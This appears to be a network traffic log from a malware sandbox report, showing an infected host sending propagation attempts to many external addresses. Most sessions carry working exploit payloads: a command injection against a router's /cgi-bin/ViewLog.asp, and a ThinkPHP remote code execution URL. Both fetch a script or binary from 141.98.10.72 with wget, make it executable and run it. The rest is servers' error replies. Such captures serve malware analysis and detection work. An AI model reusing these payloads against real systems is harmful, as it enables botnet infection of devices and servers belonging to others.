                                                      515192.168.2.155776631.136.37.1308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.232068062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:11.353493929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:17.496807098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:29.528381109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.591898918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:42.742396116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      516192.168.2.154126294.177.134.1198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.232949018 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:08.434778929 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.9
                                                      Mime-Version: 1.0
                                                      Date: Tue, 06 Apr 2021 05:25:25 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3161
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      517192.168.2.154849685.122.221.1658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.236309052 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      518192.168.2.155392894.121.185.2538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.277103901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      519192.168.2.155478094.120.37.578080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.278760910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      520192.168.2.154116494.121.155.98080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.278856993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      521192.168.2.155702662.29.126.2058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.279266119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      522192.168.2.153477295.86.113.28080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.284581900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      523192.168.2.154251488.221.230.14480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.380687952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:08.594878912 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:08 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:08 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 36 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 38 26 23 34 36 3b 32 37 62 37 31 34 33 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;669b1702&#46;1707899408&#46;27b7143d</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      524192.168.2.154284088.147.150.4480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.412745953 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:08.655389071 CET317INHTTP/1.1 400 Bad Request
                                                      Server: Web server
                                                      Date: Wed, 14 Feb 2024 08:30:01 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 155
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      525192.168.2.153805694.111.59.1038080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.488904953 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      526192.168.2.154027894.120.161.1718080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.526992083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      527192.168.2.1532960112.213.32.23880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.906174898 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:09.214154005 CET497INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 303
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 72 6f 77 77 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at growwus.com Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      528192.168.2.1544188112.85.242.20180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:08.929549932 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:09.259994984 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
                                                      Feb 14, 2024 09:30:09.310348988 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
